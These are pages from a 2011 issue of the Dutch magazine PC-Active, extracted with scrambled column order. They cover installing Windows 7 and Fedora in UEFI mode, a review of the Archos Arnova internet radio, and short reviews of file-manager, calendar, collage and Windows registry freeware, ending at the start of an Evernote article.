Praktijktest Als test hebben we de 64-bits versie van Windows 7 Ultimate Edition erbij gepakt en geïnstalleerd op een systeem met een recent Intel-moederbord met uefiondersteuning (wij gebruiken hier het Intel Desktop Board DH57DD). Omdat in Class Two-systemen de CSM niet kan worden uitgeschakeld en we de installatie-dvd uiteraard niet in bios-modus willen starten, zijn we met het volgende stappenplan aan de slag gegaan: - activeer ondersteuning voor booten in uefi-modus in het bios (onder Boot | UEFI Boot: enabled), als dit nog niet is ingeschakeld - voer de Windows installatie-dvd in - herstart de computer en druk op F10 om het Boot Menu te tonen. Dat menu is eigenlijk de EFI Boot Manager, een heuse bootloader waaraan verschillende besturingssystemen eigen boot-entry’s kunnen toevoegen. Het menu is dus niet beperkt tot een opsomming van de verschillende bootable devices in uw systeem. - in het Boot Menu verschijnen er twee entry’s voor uw dvd-drive: één met de naam van uw dvd-drive om te booten in bios-modus en een tweede genaamd
34
‘Internal EFI Shell—CDROM’ om te booten in uefimodus. - selecteer de tweede optie en start de Windowsinstaller. De installatieprocedure verschilt verder niet van die op een bios-gebaseerd systeem. Na installatie kunt u eenvoudig controleren of Windows nu via uefi opstart of niet. Open daarvoor het Schijfbeheerprogramma (via Uitvoeren | diskmgmt.msc of te vinden in het Configuratiescherm onder Systeembeheer | Computerbeheer | Schijfbeheer) en controleer de partitielay-out van uw C:\-schijf. Bevat die een ‘EFIsysteempartitie’ van 100 MB? Dan is uw installatie geslaagd! Bij de eigenschappen van de C:-schijf (klik rechts op Schijf 0, de optie Eigenschappen, tabblad Volumes) ziet u trouwens ook dat er een gpt-partitietabel is aangemaakt. De Windows Boot Manager is geïnstalleerd op de efi system partition en kan vanuit de EFI Boot Manager worden gestart. Standaard wordt de efi system partition verborgen, maar als administrator kunt u er gemakkelijk bij via de opdrachtprompt: C:\Windows\System32> mountvol F: /s C:\Windows\System32> F: F:\> dir EFI\Microsoft\Boot\*.efi 14/07/2009 02:52 14/07/2009 02:52 14/07/2009 02:48 3 bestand(en) 0 map(pen)
Wilt u Linux installeren op een uefi-systeem, dan moet u ook goed opletten. Dit verloopt namelijk niet even vlot bij alle distributies. Zie het kader ‘Linux op een uefi-systeem’.
Uefi-applicaties We zagen reeds dat zowel Windows als Fedora hun bootloader als een efi-bestand installeren op de efi
PC-ACTIVE | Nr. 245 – 2011
306 Intel-moederbord.indd 34
10-02-2011 16:49:24
UEFI
| HARDWARE
Linux op een uefi-systeem Hoewel uefi al jaren ondersteund wordt door verschillende Linux-componenten (kernel, bootloader, ...), is een volledig uefi-gebaseerde installatie niet zo eenvoudig. Dat is enerzijds alweer te wijten aan de CSM die steeds actief is, maar anderzijds onderstéunen de meeste Linux-installers überhaupt geen uefi-installatie. Handmatig ingrijpen (bij het partitioneren en installeren van de bootloader) is vaak de enige oplossing. Een positieve uitzondering is Fedora, dat vanaf versie 14 (enkel 64-bits) volledige ondersteuning voor uefi-installaties biedt. Het enige addertje onder het gras is dat u expliciet een uefi-versie van de installer moet opstarten om de bios-emulatie te negeren. Daarvoor kunt u dezelfde truc toepassen als bij Windows 7, of u maakt als volgt een Fedora uefi-bootimage op een usb-stick aan: - download de installatie-dvd van een mirror (zie hyperlinks) - mount het iso-bestand: $ mkdir iso $ sudo mount -o loop Fedora-14-x86_64-DVD.iso iso
- Sluit een usb-stick aan, zoek de bijbehorende device name op (in ons voorbeeld sdd) en unmount de stick: $ mount | grep sd $ sudo umount /dev/sdd1
- kopieer efidisk.img met dd naar uw usb-stick (die daardoor volledig overschreven wordt!): $ sudo dd if=iso/images/efidisk.img of=/dev/sdd
- umount het iso-bestand: $ sudo umount iso && rmdir iso
Vervolgens brandt u de gedownloade Fedora-iso op een lege dvd, stopt u zowel de usb-stick als de dvd in uw pc en herstart u vanaf de usb-stick. U kiest vervolgens uw taal en toetsenbordlay-out en selecteert ‘Local CD/DVD’ als installatiemedium (de usb-stick bevat enkel de installer zelf, de te installeren software staat op de dvd). Daarna wordt de grafische installer opgestart en volgt u de instructies op het scherm. Voor meer uitleg verwijzen we naar de uitstekende Installation Guide. Na installatie kunt u snel controleren of Fedora nu via uefi boot of niet. Naast de klassieke /boot-partitie moet er dan immers ook een EFI System Partition zijn (gemount op /boot/efi): $ mount | grep boot /dev/sda2 on /boot type ext4 (rw) /dev/sda1 on /boot/efi type vfat (rw,umask=0077,shortname=winnt)
Die partitie bevat de eigenlijke Grub-bootloader en de configuratie ervan: $ find /boot/efi -type f /boot/efi/EFI/redhat/grub.conf /boot/efi/EFI/redhat/grub.efi
system partition. Zo’n efi-bestand is in feite niet meer dan een speciale executable die uitgevoerd wordt door de uefi-firmware. Dankzij Intels EFI Development Kit kunnen ontwikkelaars eenvoudig
extra uefi-applicaties aanbieden die u kunt starten vanuit de uefi boot manager. Dergelijke applicaties zullen veelal door pc-fabrikanten voorgeïnstalleerd worden: denk maar aan een recovery tool om
We hebben een efi-systeempartitie na installatie
PC-ACTIVE | Nr. 245 – 2011
306 Intel-moederbord.indd 35
35
10-02-2011 16:49:39
HARDWARE
| UEFI
tools diskpart, chhdsk en format (zie hyperlinks). Om die tools te installeren, kopieert u de efi-bestanden van de map binaries\x64 in het zip-bestand naar uw usb-stick, bijvoorbeeld in een submap Tools. Herstart nu uw pc en ga naar het Boot Menu via F10. U ziet nu normaalgesproken twee entry’s van het type Internal EFI Shell--Hard Drive. Het is even gokken welke entry uw interne bootschijf is en welke de usb-stick: in ons geval was de eerste entry de stick. Selecteer die entry en enkele seconden later bevindt u zich in de EFI Shell, waarin u met de cd- en ls-commando’s de EFI-applicaties kunt lokaliseren en starten. Let ook op dat u op het juiste device zoekt: standaard bevindt u zich in fs0: (de interne EFI System Partition), terwijl de applicaties van uw stick wellicht op fs2: staan (fs1 is de Windows-partitie van uw bootschijf). Met het commando help krijgt u overigens een beknopt overzicht van alle beschikbare commando’s in de uefi Shell.
Conclusie De C:-schijf bevat nu een gpt-partitietabel en mag groter dan 2 TB zijn
Windows te herinstalleren of een minimaal ‘instanton’ besturingssysteem waarmee u onmiddellijk kunt surfen op het web. Beschikt uw bord niet over dergelijke extra mogelijkheden, dan kunt u uiteraard ook zélf uefi-applicaties downloaden en installeren. Het aantal gratis beschikbare uefi-applicaties is nog redelijk beperkt, maar we tonen u alvast hoe u ermee aan de slag gaat. U gebruikt het beste een aparte usb-stick voor uw experimenten: als het misloopt heeft dat geen impact op uw Windows-installatie! Formatteer de stick in fat-formaat (mbr-partitionering is ook geen probleem) en download de efi development kit (zie hyperlinks). Unzip de EDK en kopieer vervolgens het bestand Edk\Other\Maintained\Application\UefiShell\ bin\x64\Shell_Full.efi naar \EFI\Boot\bootx64.efi op uw stick. Met dit bestand kunt u vanaf uw usb-stick de uefi shell starten, een rudimentaire commandlineomgeving die qua syntax lijkt op een mengeling van dos en Linux. Vervolgens plaatst u de gewenste uefi-applicaties op de stick. De subdirectory Apps in de hierboven vermelde EDK-map bevat een aantal kleine tools (zoals hexdump en edit), maar u kunt bijvoorbeeld ook bij Microsoft terecht voor uefi-versies van de bekende
Uefi in VirtualBox Sinds versie 3.1 bevat VirtualBox experimentele ondersteuning voor uefi. U kunt uefi per individuele virtuele machine activeren door onder Instellingen | Systeem | Moederbord de optie Zet EFI aan aan te vinken. Op die manier kunt u de uefi Shell en verschillende uefi-applicaties ook proberen als uw computer geen uefi ondersteunt.
36
Uefi bevat een aantal features die binnen het aloude bios ondenkbaar zijn: extreem kortere boottijden, ondersteuning voor bootschijven groter dan 2 TB en moderne preboot-applicaties met netwerkondersteuning en uitgebreide grafische mogelijkheden. Windows ondersteunt uefi enkel in de 64-bits versies van Vista en 7, maar andere versies kunt u dankzij de CSM bios-emulatie ook prima installeren op de huidige uefi-borden. Er is dus eigenlijk geen reden om niet te kiezen voor een uefi-systeem als u beslist een nieuwe pc aan te schaffen.
INFORMATIE Phoenix instant boot bios www.youtube.com/watch?v=WpviWpTaTFA Asus P5Q Deluxe uefi-update vip.asus.com/forum/view.aspx?id=20091019202824968 Fedora download mirrors.fedoraproject.org/publiclist/Fedora/14/x86_64 Fedora Installation Guide docs.fedoraproject.org/en-US/Fedora/14/html/ Installation_Guide EFI Development Kit sf.net/projects/efidevkit/files/Releases/ Official%20Releases/ Microsoft EFI Disk Utilities http://www.intel.com/technology/efi/ diskutil_overview.htm
PC-ACTIVE | Nr. 245 – 2011
306 Intel-moederbord.indd 36
10-02-2011 16:49:53
Muziek van uw computer.
Speelt hier draadloos af.
BOSE SoundLink ®
®
wireless music system
U kunt overal in huis draadloos genieten van de muziek op uw computer. Luister in elke gewenste ruimte naar iTunes, internetradio of een andere muziekbron. Het is simpel. U hoeft geen software te laden. De installatie is eenvoudig. Sluit gewoon de compacte SoundLink USB®
sleutel aan op uw computer, kies uw favoriete muziek en geniet draadloos met het Bose SoundLink system. Waar u ook naar luistert, van internetradio tot elk ®
®
nummer in uw digitale discotheek, alles komt tot leven dankzij het kwaliteitsgeluid van Bose. Het systeem bevat een oplaadbare lithium-ionaccu en een handige afstandsbediening. Waarom zou u zich beperken tot uw computer? Ervaar zelf het SoundLink wireless music system en ®
Reddot design award, winner 2010
ontdek hoe eenvoudig draadloos genieten met Bose-geluid is.
Thuis. Op het werk. Onderweg. Maak kennis met Personal Audio van Bose. ®
Bel 0299 390290, bezoek www.bose.nl, of ga naar uw geautoriseerde Bose Personal Audio-dealer.
Muziek in de slaapkamer is tegenwoordig ook het liefst digitaal. Er zijn legio fabrikanten die op die trend inspelen. Maar meestal zijn de apparaten net te groot, te duur of te beperkt. De Archos Arnova zag er veelbelovend uit, maar zou zomaar meuk kunnen blijken. Tijd om te bestellen dus…
I
n mijn kantoortje staat een nas met daarop de muziek van in totaal zo’n 2.500 cd’s. Allemaal zelf gekocht, ze staan keurig in de kast. Maar als flac-bestanden is het toch net wat handiger afspelen via het Sonos-muzieksysteem. Maar om nou zo’n dure Sonos in de slaapkamer te zetten. Zeker met een bijbehorende hifi-versterker en afdoende luidsprekers wordt het een dure grote wekkerradio. Natuurlijk zijn er zat kastjes die in staat zijn om muziek vanaf mijn thuisnetwerk af te spelen. Wifi en cat5. Het is allemaal beschikbaar naast mijn bed. Alleen, ik vertik het om die flac-bestanden allemaal nog eens om te zetten naar een ander formaat. En verreweg de meeste van die streaming audioapparaten houden niet van flac. Lossy compressie is de norm geworden, jammer genoeg. Maar deze Arnova doet wel flac!
Wifi De Arnova is per definitie draadloos, maar helaas alleen 802.11 b/g; geen n, geen hoge snelheden dus. Daarmee zit ’t apparaat mijn notebook en Ipod Touch
lelijk in de weg, op het simpele toegangspunt met slechts één antenne. De verbinding kwam soepel tot stand, waarna binnen enkele minuten alle instellingen naar eigen smaak waren ingevuld. Nederlands als menutaal – op een enkele Deense foutmelding na. En binnen de kortste tijden luisterde ik tevreden naar RTÉ Raidió na Gaeltachta, een Ierstalige station met veel traditionele muziek. Stations kiezen gaat simpel op regio of op onderwerp. Naast vele duizenden – Archos claimt 12.000 – radiostations zijn er ook 1.273 televisiekanalen, te bekijken op het 9 cm 320×240 lcd-scherm. Daarnaast kan men kiezen voor podcasts – deels ook video – en SHOUTcast, hoewel dat de foutmelding Ingen data liste opleverde. Waar die lijsten met content precies vandaan komen, is overigens niet helder – en dat is toch wat zorgelijk. Als die server om welke reden dan ook ooit uit de lucht gaat, zit je zonder internetkanalen, want zelf een ip-nummer opgeven kan niet. Onder al die stations zit ook het nodige aan Nederlands, maar de lijsten zijn niet zo netjes bijgehouden als je mogelijk wilt, Suriname valt bijvoorbeeld onder Europa.
Voor- en achterzijde van de Archos Arnova
38
PC-ACTIVE | Nr. 245 – 2011
308 LoM - Archos.indd 38
10-02-2011 15:13:51
ARCHOS ARNOVA
Voor- en achterzijde van de Archos Arnova
Ook muziek op het eigen netwerk kan via upnp worden afgespeeld. Maar spijtig genoeg alleen per track. Een album selecteren, of afspeellijsten gebruiken, gaat niet. Dat is een fikse beperking van het gebruiksgemak! Wie dan uit arren moede maar de mp3-speler aansluit met de eigen speellijsten kan dat doen via de lijningang, maar dat is toch wel het paard achter de wagen spannen.
Stroom De Arnova wordt geleverd met een netadapter die via een mini-usb-stekker het apparaat van stroom voorziet. Dezelfde usb-aansluiting is ook bestemd om de radio/tv aan de pc te hangen, om het interne geheugen van 2 GB of de sd-kaart te kunnen benaderen. De 5 V 1 A schakelende voeding gaf geen eigenverbruik te zien als de Arnova was uitgeschakeld. Met het apparaat aan – in rust – werd 2,5 W verbruikt, spelend op een laag volume 3,0 W en op maximaal volume – wat overigens niet overstuurde! – werd 5,9 W geconsumeerd. Jammer genoeg wel bij een cos van 0,43, maar dergelijke beroerde vermogensfactoren zijn nu eenmaal schering en inslag bij goedkope schakelende voedingen. Wat stroomverbruik betreft, zet hij nette meetwaarden neer voor een draadloos apparaat. Overigens, draadloos gaat in dit geval dubbelop: er is een batterijvak waar vier penlight-batterijen in passen. De handleiding raadt dit weliswaar af omdat het stroomverbruik wat hoog zou liggen voor batterijgebruik, maar in de praktijk werkt het erg prettig. Wifi in de tuin wordt zo nog belangrijker! Wat die batterijduur betreft, uitgaande van een gemiddeld verbruik van 4 W bij 230 V vraagt de Arnova 17 mA. Vier batterijen leveren 6 V, hetgeen een verbruik van 650 mA zou opleveren. Inderdaad fors, maar met vier 2.700 mAh accuutjes kunt u toch ruim vier uur uit de voeten – hetgeen overeenkomt met wat we in de praktijk hebben vastgesteld. Met batterijen wordt het dure muziek, met accu’s is dat echter best te overzien. Overigens, wie – zoals wij – niet eerst de handleiding doorspit, maakt al snel een nare fout. Want in die handleiding wordt gewaarschuwd om het apparaat niet op het lichtnet aan te sluiten met geplaatste batterijen. Inderdaad, de batterijtjes voelden al wat te warm aan, toen we ze er gehaast weer uithaalden…
Wekker Is het de ideale wekker? Nee, jammer genoeg schiet de wekfunctie tekort. Twee alarmtijden, per dag of week
| HARDWARE
Leuk of meuk? Een nieuwe rubriek in PC-Active, maar we beloven niet dat deze elk nummer zal verschijnen. Het hangt er van af, wat we vinden aan onverwachte zaken. Want daar gaat het om op deze pagina’s. Hardware of software die we ergens tegen het lijf lopen en waarvan we ons afvragen of het eigenlijk wat is. Is het zijn geld waard? Vreemde apparaten, rare toepassingen. ’t Kost wel geld om het eens te proberen. En er staat al zoveel ongebruikte zooi in de kast! Dat is voor ons als redactie nu eenmaal een stuk minder problematisch. We hebben grote kasten en vooral, een onkostenrekening om eens wat aan te kopen en aan de tand te voelen. Vandaar: Leuk of Meuk. En komt u iets tegen waar u van vindt dat het een kandidaat moet zijn voor deze rubriek? Mail ons op [email protected] en wie weet staat het over een maand of wat in Leuk of Meuk!
instelbaar, compleet met snoozefunctie en met vrij te kiezen muziekjes uit het interne geheugen of internetradiostation als wekmelodie, ’t klinkt goed. Maar als de ingestelde tijd is aangebroken zet het apparaat zichzelf niet aan. Hij moet dus de hele nacht aan blijven. En het volume is dat van de zachte muziek waarmee je de avond tevoren in slaap bent gevallen, dus dat schiet niet op. Internetradio als wektoon hebben we al helemaal niet op gang gekregen.
Geluid Over de geluidskwaliteit kunnen we kort zijn: belabberd. Zoals te verwachten natuurlijk, met twee luidsprekertje van 32 mm doorsnede die op 14 cm uit elkaar zitten; berekend zijn op 2 W ieder. De versterker zal wel nog minder vermogen afleveren. Bassen? Zijn er niet. Samen met het stereobeeld verdwenen. Maar met een aangesloten koptelefoon blijkt de kwaliteit zeker niet tegen te vallen, een helder geluid met goed laag en prettig hoog. Wie internetradio in hifi over wifi verwacht, zal die goede koptelefoon nodig hebben. Persoonlijk vergeven we een kleine draagbare radio zijn onvermijdelijk ietwat blikkerig transistorgeluid graag.
Conclusie Leuk! (Maar ’t spande er wel om, toch wel erg veel losse eindjes, Archos!)
avi, mpeg4, flv mp3, wma, wav, aac, flac jpg, png, gif 199×84×84 mm 416 g www.archos.com
PC-ACTIVE | Nr. 245 – 2011
308 LoM - Archos.indd 39
39
10-02-2011 15:14:51
VERKENNER WORDT OVERBODIG
DIRECTORY OPUS TEKST : JAN ROZ A
Alles op uw pc draait om bestanden, dus als u bestanden moet beheren, is goed gereedschap zeer gewenst. De Windows Verkenner is niet slecht, maar dat het nog veel beter kan, bewijst Directory Opus.
O
f u nu aan tekstverwerken doet of juist uw foto’s opslaat en bewerkt op uw pc, uiteindelijk komt het allemaal op hetzelfde neer: alles wat u doet, resulteert in bestanden op de harde schijf. Hoe langer u op uw computer werkt hoe groter het aantal bestanden wordt en om nog enigszins orde in de chaos te scheppen is het belangrijk uw gegevens netjes te ordenen in mappen en eventueel in verschillende partities. Het beheren van al die bestanden, mappen en partities doet u waarschijnlijk nu met de standaard in Windows aanwezige Verkenner, maar zijn bestandsbeheerders die veel meer gemak bieden! Sommige Verkennerconcurrenten bieden enkel de mogelijkheid om meer vensters tegelijk te tonen terwijl andere weer zaken als ingebouwde viewer voor bekende formaten aanbiedt. Het in Europa niet zo bekende, uit Australië afkomstige Directory Opus biedt u alles in een. Dit pakket kan zich wat uiterlijk betreft, voordoen als het bekende Commander met twee vensters naast elkaar, maar het kan ook, zowel horizontaal als verticaal,
twee boomstructuren met ieder een bestandsvenster laten zien. Wilt u toch liever een enkel venster zoals ook in de Verkenner, dan is een enkele muisklik voldoende. Kortom Directory Opus is er voor elke smaak.
Alles aan boord Van een bestandsbeheerprogramma mag u verwachten dat u er dat u er bestanden mee kunt kopiëren, verplaatsen en kunt wissen en uiteraard is dat ook geen enkel probleem in Directory Opus. Dit programma gaat echter veel verder doordat het ingebouwde ondersteuning heeft voor zip- en rar-bestanden en ook een viewer heeft voor alle gangbare formaten voor afbeeldingen en video’s. U kunt via Directory Opus al uw afbeeldingen zelfs in diavoorstellingen tonen. Muziekliefhebbers kunnen via dit programma de mp3-tags van hun muziekbestanden direct bekijken en wijzigen en fotografen zien in een klein venster meteen alle exif-gegevens van een geselecteerde foto. Verder kunt u veelgebruikte mappen opnemen in een favorietenlijst. Bijzondere mappen zijn te voorzien van een afwijkende gekleurd lettertype om zo sneller op te vallen in de boomstructuur. Wie een website te onderhouden heeft, beleeft waarschijnlijk ook veel plezier aan Directory Opus aangezien de software volledige ftp-functionaliteit aan boord heeft! Voor veel gebruikte programma’s kunt u een snelkoppeling opnemen in een aparte knoppenbalk zodat eigenlijk al uw computerwerk gedaan kan worden vanuit Directory Opus. Een complete opsomming van alle mogelijkheden van dit programma zou te veel worden voor deze pagina, u moet het dus gewoon zelf ervaren.
CONCLUSIE Directory Opus is een zeer compleet programma en veel meer dan alleen een vervanger voor de Windows Verkenner. Dit programma zal, als u het eenmaal helemaal doorhebt, de spil worden van alle software op uw computer. Alles in dit programma is aan te passen aan uw persoonlijke voorkeur.
Directory Opus 9.5.6 Auteur Toepassing Systeem Registratie
40
GP Software Bestandsbeheer Windows NT/XP/Vista/7 AUS$ 85 (≈ € 65)
PC-ACTIVE | Nr. 245 – 2011
400 Software A.indd 40
11-02-2011 08:00:44
SOFTWARE
KALENDER IN OPTIMA FORMA
CALENDAR MAGIC
E
en kalender lijkt zo’n vanzelfsprekend ding, maar wist u dat er wel meer dan vijfentwintig verschillende kalenders bestaan? Van Afghaans en Gregoriaans tot Persisch en Vietnamees, Calender Magic ondersteunt ze allemaal en laat u een datum omzetten van de ene naar de andere kalender. U kunt ook twee kalenders tegelijk in beeld brengen waardoor u bijvoorbeeld de kalender van de Franse revolutie ziet met daaronder de corresponderende Gregoriaanse kalender. Dit programma kan echter veel meer dan enkel wat kalenders tonen, want als u nu toch een kalender tot uw beschikking hebt, is het wel handig als u daarin ook afspraken kunt vastleggen. Uiteraard wordt u netjes gewaarschuwd via geluid en een boodschap als een vastgelegde afspraak aanstaande is. Verder kunt u met tijden rekenen, wachtwoorden instellen en losse notities vastleggen. Een beetje vreemde eend in de bijt is de ingebouwde calculator waarmee u wiskundige berekeningen kunt maken, maar ook magisch vierkanten kunt genereren aan de hand van een ingevoerd getal (handig voor Sudoku’s).
roeger was het makkelijk, als u leuke foto’s had, dan hing u die op het prikbord en kon u er elke dag van genieten. Met de pc is alles digitaal geworden, dus ook het maken van fotocollages. CollageIt maakt ze in drie stappen: selecteer de foto’s, geef de gewenste instellingen op en klik vervolgens op Generate Layout. Per collage kunt u opgeven of de foto’s moeten worden voorzien van een kader en een schaduwrand, of alle foto’s of slechts een deel ervan moet worden gebruikt, hoeveel ruimte moet overblijven tussen de foto’s en of de foto’s automatisch moet worden gekanteld. Ook de achtergrond
van de fotocollage kan geheel naar eigen smaak worden ingesteld. Als het resultaat naar uw zin is, slaat u hem op. De aangemaakte collage wordt dan als een nieuw plaatje opgeslagen.
PearlMountain Software Fotocollages Windows XP/Vista/7 US$ 19,90 PC-ACTIVE | Nr. 245 – 2011
400 Software A.indd 41
41
11-02-2011 08:01:55
REGISTERTOOLS
HANDIGE FREEWARE TEKST : PIE TER - CORNELIS AVONTS
Het belang van het Windows-register is bekend en we hoeven u evenmin te vertellen dat u het beste voorzichtig kunt zijn met aanpassingen. Met deze wetenschap in het achterhoofd hebt u ongetwijfeld profijt van de volgende freewaresoftware.
Een complete registerback-up en -herstel
ERUNT 1.1J U kunt op verschillende manieren een back-up van het register maken. Dat kan met het ingebouwde systeemherstel, maar dat back-upt niet de complete registerhives, en wat te doen als het herstelpunt niet langer beschikbaar is? Een specifieke (sub)sleutel veilig stellen kunt u doen door die vanuit Regedit (of de opdrachtregeltool reg) te exporteren. Voor een complete back-up bent u beter af met ERUNT (Emergency Recovery Utility NT). Het is weliswaar een wat ouder tooltje, maar werkt ook nog in Windows Vista of 7. Als u de software zo instelt, zorgt ERUNT bij elke Windows-opstart voor een kopie. Standaard wordt het oudste exemplaar na 30 dagen automatisch verwijderd, maar dat valt aan te passen:
42
open in de programmagroep Opstarten het eigenschappenvenster van ERUNT Autobackup en voeg bij Doel de parameter /days:x toe (vervang x door het gewenste aantal kopieën). U kunt echter op elk moment ook zelf zo’n back-up maken. Die komen standaard terecht in c:\windows\erdnt\. Bij een systeemcrash hoeft u – desnoods vanaf een live-cd – maar naar de map \Windows\erdnt te navigeren en daar erdnt.exe op te starten. Meer uitleg krijgt u op de site van ERUNT.
ERUNT 1.1j Systeemeisen: Windows XP/Vista/7 Informatie: www.larshederer.homepage.t-online.de/erunt
PC-ACTIVE | Nr. 245 – 2011
402 Software B.indd 42
11-02-2011 07:51:46
SOFTWARE
Twee snapshots: zoek de verschillen…
REGISTRY COMPARISON UTILITY 3.200 Nog zo’n oudje dat met enige goodwill nog prima draait onder Windows 7 en Vista (uitvoeren als administrator). De tool komt met name van pas als u precies wilt weten wat bijvoorbeeld de installatie (of verwijdering) van een nieuwe software met het register uitvoert. U start Registry Comparison Utility op en maakt via Export Registry een kopie van een deel van het register. Daarna voert u de geplande installatie, aanpassing of verwijdering uit – laat Registry Comparison Utility draaien. Daarna exporteert u via Export Registry nogmaals het betreffende registeronderdeel. Kies Begin Compare en na afloop op Analysis Tools. Hier kunt u dan beide exportbestanden met elkaar vergelijken, eventueel na het activeren van een weergavefilter.
Windows XP/Vista/7 www.tonysfreeware.com/ download/RegistryCompare.exe
PROCESS MONITOR 2.93 Net als Registry Comparison Utility toont ook Process Monitor de wijzigingen die in het register zijn aangebracht. Of liever, worden aangebracht, want Process Monitor toont deze registerwijzigingen in real time. Dat levert in de meeste gevallen een onoverzichtelijk resultatenlijst op, maar die laat zich gelukkig wel filteren. Om te beginnen kunt u via de knoppenbalk aangeven dat u alleen maar registeractiviteit in de gaten wilt houden. Standaard houdt Process Monitor name-
Een weelde aan informatie, die duidelijk om een doordachte filtering vraagt
PC-ACTIVE | Nr. 245 – 2011
402 Software B.indd 43
43
11-02-2011 07:52:14
SOFTWARE
lijk ook bestands-, netwerk- en procesactiviteiten bij. Via de filterknop kunt u binnen de resultatenlijst ook nog op allerlei (gecombineerde) criteria filteren. Zeer handig is de knop Include Process From Window. Wanneer u die boven een geopend programmavenster loslaat, krijgt u meteen te zien wat die applicatie precies doet in het register. Klikt u een item uit de resultatenlijst met de rechtermuisknop aan en kiest u Properties, dan krijgt u nog veel meer technische informatie te zien. Ook handig: via Jump to opent u meteen de Windows Register-editor op de plaats van de geselecteerde sleutel.
komende informatie over opvragen (zij het lang niet zo uitgebreid als bij Process Monitor) of het item snel in RegEdit laten openen. Het is eveneens mogelijk de resultatenlijst naar een html-pagina te exporteren of geselecteerde items naar een txt-, html-, csv-, xml- of reg-bestand op te slaan. Op de site kunt u terecht voor een Nederlands taalbestand voor deze tool.
RegScanner 1.82 Systeemeisen Informatie
Windows XP/Vista/7 www.nirsoft.net/utils/regscanner.html
Process Monitor 2.93
REGFROMAPP 1.21
Systeemeisen Informatie
RegFromApp is van dezelfde auteur (Nir Sofer) als RegScanner. Start het als administrator op. Het heeft wat functionaliteit betreft iets weg van Process Monitor, alleen richt het zijn pijlen specifiek op één bepaald proces (toepassing). Wanneer u namelijk de tool opstart, krijgt u een overzicht te zien van de lopende processen. U hoeft dan maar een van deze processen aan te klikken om alle sleutelwaarden te zien verschijnen die door dat proces in real time worden aangepast. Via het menu Opties | Weergave-modus kunt u verder nog kiezen of u de nieuwe, gewijzigde waarden dan wel de oorspronkelijke waarden te zien krijgt. Via het menu Bestand | Opslaan als legt u de genoteerde aanpassingen in een reg-bestand vast. U kunt deze tool ten andere ook gebruiken om wijzigingen die u zelf doorvoert, vast te leggen. Kies in dit geval Bestand | Nieuw proces starten en navigeer via de knop Bladeren naar c:\Windows\regedit.exe. Houd wel in
Windows XP/Vista/7 technet.microsoft.com/en-us/sysinternals/ bb896645
REGSCANNER 1.82 De in Windows ingebouwde registereditor bevat slechts een rudimentaire zoekfunctie. RegScanner blijkt een heel stuk flexibeler. Een van de belangrijkste verschilpunten is dat u hier de zoekresultaten niet een voor een te zien krijgt, maar allemaal samen in één overzichtsvenster. Het is tevens mogelijk de zoekresultaten bijvoorbeeld nog te beperken tot welbepaalde sleuteltypes (zoals REG-DWORD), tot sleutels die tussen bepaalde tijdstippen zijn gewijzigd, of tot gegevens van een specifieke lengte. De zoekresultaten kunnen bovendien hoofdlettergevoelig zijn. Klikt u een item uit de resultatenlijst aan, dan kunt u daar bij-
RegScanner: een prima tool voor nauwgezette zoekopdrachten
44
PC-ACTIVE | Nr. 245 – 2011
402 Software B.indd 44
11-02-2011 07:52:31
SOFTWARE
Leg alle activiteiten van een bepaald proces of programma vast in een reg-bestand
het achterhoofd dat RegFromApp alleen gewijzigde waarden monitort en dus geen compleet nieuwe sleutels registreert. Ook voor deze tool vindt u op de site een Nederlands taalbestand.
Wel even opletten aan het einde van de installatie van Registry Life dat u niet ongewild ook de plugin FaceMoods installeert (klik op Decline om dat te voorkomen)!
RegFromApp 1.21
Registry Life 1.26
Systeemeisen Informatie:
Systeemeisen Informatie
Windows XP/Vista/7 www.nirsoft.net/utils/ reg_file_from_application.html
Windows XP/Vista/7 www.chemtable.com/RegistryLife.htm
REGISTRY LIFE 1.26 Wanneer u programma’s installeert en gebruikt, wijzigen of creëren die nagenoeg altijd registersleutels. In principe horen die weer te verdwijnen zodra u de toepassing weer verwijdert. In de praktijk echter laten die vaak overtollige items in het register achter. Registry Life analyseert de logische structuur van het register en verwijdert dergelijke items. Dat kan met een eenvoudige druk op de knop Fix, maar u als gevorderde gebruiker wilt ongetwijfeld eerst inzage in de betreffende onderdelen. Dat kan en u kunt vervolgens zelf instellen welke items u al dan niet opgeruimd wilt zien. Registry Life is in elk geval wel zo verstandig om automatisch eerst een back-up van de verwijderde registeringangen te maken. Die vindt u via het menu Backups en met één muisklik zet u alle items netjes weer terug. Ook handig: via het Settings-menu kunt u onder meer een Ignore list aanmaken zodat de tool specifieke registeritems of -paden ongemoeid laat. De tool kan verder nog de fysieke structuur van het register analyseren en het register defragmenteren en comprimeren. Na zo’n operatie dient u de pc wel eerst te herstarten.
Registry Life ruimt het register op en defragmenteert en comprimeert het
PC-ACTIVE | Nr. 245 – 2011
402 Software B.indd 45
45
11-02-2011 07:53:15
EVERNOTE
AANTEKENINGEN IN DE CLOUD TEKST : FREDERICK GORDTS
Hebt u ook een bestanden op uw bureaublad of systeem staan, met daarin belangrijke aantekeningen, e-mailadressen of een takenlijstje? Met Evernote zet u deze aantekeningen in de cloud, zodat u er overal toegang toe hebt. Bovendien maakt Evernote elk bestand doorzoekbaar, inclusief uw pdf’s.
E
vernote is een Amerikaanse dienst die al uw aantekeningen in de cloud opslaat. Het gaat niet om ‘echte’ bestanden en is dus niet meteen vergelijkbaar met cloudopslagdiensten als Dropbox of Box.net. Evernote installeert u als programma op uw computer, waarna u zogeheten ‘notebooks’ aanmaakt. Een notebook is een doorzoekbaar notitieblokje waarin u notities in aanmaakt. Elke note kan onbeperkt lang zijn en u kunt er ook formattering (lettertypes, kleuren, et cetera) op toepassen.
Het Evernote-programma is er voor Windows, maar er is inmiddels ook een niet-officiële Linux-versie die NeverNote heet. Wat Evernote interessant maakt, zijn de mobiele apps (voor Android, iOS, Blackberry, Palm en Windows Mobile) en de website, waar u ook al uw aantekeningen kunt raadplegen (en doorzoeken). Al uw aantekeningen worden namelijk zowel lokaal als op de Evernote-server (in de VS) opgeslagen, en dat betekent dus dat u alle aantekeningen steeds kunt raadplegen, zowel op de pc, op de website als op uw
Aantekeningen zijn doorzoekbaar
46
PC-ACTIVE | Nr. 245 – 2011
404 Evernote.indd 46
10-02-2011 14:56:47
EVERNOTE
